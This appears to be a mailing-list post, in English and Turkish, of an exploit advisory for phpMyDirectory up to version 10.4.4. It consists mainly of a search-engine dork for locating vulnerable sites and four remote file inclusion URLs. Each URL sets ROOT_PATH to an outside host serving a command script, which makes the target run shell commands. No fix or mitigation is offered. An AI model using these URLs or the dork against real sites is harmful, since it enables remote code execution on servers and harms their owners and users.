<<< Date Index >>>     <<< Thread Index >>>

phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)



ENGLISH

# Title  :   phpMyDirectory <= 10.4.4 Multiple Remote File Include 
Vulnerabilities

# Dork   :   "powered by phpmydirectory"

# Author :   ajann

# greetz :   Nukedx,TheHacker 

# Exploit;

###  
http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

###  
http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

###  
http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

### SOME; 
http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

# ajann,Turkey


TURKISH

# Ba&#351;l&#305;k          :   phpMyDirectory <= 10.4.4 Multiple Remote File 
Include Vulnerabilities
# Sözcük[Arama]   :   "powered by phpmydirectory"
# Aç&#305;&#287;&#305; Bulan     :   ajann
# greetz          :   Nukedx,TheHacker 
# Aç&#305;k bulunan dosyalar;

###  
http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
###  
http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
###  
http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### SOME; 
http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

Aç&#305;klama: 
Temalarda bulunan footer.php dosyas&#305; güvenlik aç&#305;&#287;&#305;na yol 
açmaktad&#305;r.Bu sayede uzaktan kod çal&#305;&#351;t&#305;r&#305;labilir.
defaults_setup.php kurulumdan sonra silinmemi&#351;se ayn&#305; aç&#305;k 
uygulanabilmektedir.
test/header.php bölümü ise bazen denk gelmektedir,ayn&#305; aç&#305;k 
bulunmaktad&#305;r.
Aç&#305;k 10.4.4 dahil alt sürümlerinde çal&#305;&#351;maktad&#305;r.

Thanks.